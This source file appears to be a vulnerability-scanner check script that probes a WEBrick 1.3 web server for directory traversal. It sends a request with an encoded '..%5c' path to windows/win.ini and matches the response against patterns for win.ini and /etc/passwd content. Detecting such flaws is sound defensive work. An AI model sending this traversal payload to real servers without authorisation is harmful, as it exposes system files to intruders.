#include helpers.inc;
#include classMatches.inc;
// **************************************************************************************							 
function alert(job, fname)
{	
	var ri = new TReportItem();
	ri.LoadFromFile(fname);
	ri.affects = "Web Server";
	ri.alertPath = "Scripts/" + fname; 	
		
	ri.setHttpInfo(job);
	
	AddReportItem(ri);	
}							 
// **************************************************************************************
function TestForDirectoryTraversal(matches, job)
{
	var res = null;
	
		matches.plainArray = [
							"; for 16-bit app support"			
						  ];
		
		matches.regexArray = [
							/<b>Warning<\/b>:\s\sDOMDocument::load\(\)\s\[<a\shref='domdocument.load'>domdocument.load<\/a>\]:\s(Start tag expected|I\/O warning : failed to load external entity).*(Windows\/win.ini|\/etc\/passwd).*\sin\s<b>.*?<\/b>\son\sline\s<b>\d+<\/b>/
						  ];	
	
	var matchedText = matches.searchOnText(job.response.body);	
	if (matchedText) { alert(job, "WEBrick_v.1.3_Directory_Traversal.xml"); res = 1; }
	
	return res;
}
// **************************************************************************************							 
function request(uri)
{
	var http = new THTTPJob();
		
	http.url = scanURL;
	http.addCookies = false;
	http.verb = 'GET';
	http.URI = uri;
	http.execute();	
	if (!http.wasError)
	{
		return TestForDirectoryTraversal(matches, http);
	}	
}
// **************************************************************************************	
function startTesting()
{
	if (request('/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini')) return;	
}
/***********************************************************************************/
/* main entry point */
var matches = new classMatches();
startTesting();
